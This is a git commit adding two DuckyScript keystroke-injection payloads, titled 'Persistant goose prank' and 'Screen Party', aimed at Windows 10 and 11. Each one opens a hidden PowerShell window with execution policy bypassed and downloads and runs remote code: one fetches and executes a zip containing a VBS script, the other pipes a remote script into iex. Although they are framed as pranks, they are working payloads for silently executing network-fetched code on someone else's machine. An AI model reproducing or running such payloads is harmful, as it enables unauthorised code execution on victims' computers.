Add files via upload

This commit is contained in:
egieb
2024-03-27 20:13:43 +00:00
committed by GitHub
parent 6576e0ae9d
commit 637217dba0
2 changed files with 33 additions and 0 deletions

View File

@@ -0,0 +1,18 @@
REM Title: Persistant goose prank.
REM Author: @beigeworm
REM Description: Spawn an annoying goose and replace it if it's killed by the user.
REM Target: Windows 10 and 11
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H
ENTER
DELAY 4000
STRING $url = "https://github.com/beigeworm/assets/raw/main/Goose.zip";$tempFolder = $env:TMP;$zipFile = Join-Path -Path $tempFolder -ChildPath "Goose.zip";$extractPath = Join-Path -Path $tempFolder -ChildPath "Goose";Invoke-WebRequest -Uri $url -OutFile $zipFile;Expand-Archive -Path $zipFile -DestinationPath $extractPath;$vbscript = "$extractPath\Goose.vbs";& $vbscript
ENTER

15
Pranks/ScreenParty.txt Normal file
View File

@@ -0,0 +1,15 @@
REM Title: Screen Party
REM Author: @beigeworm
REM Description: Uses Powershell to display a form with changing colors
REM Target: Windows 10 and 11
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Pranks/Screen-Party.ps1 | iex
ENTER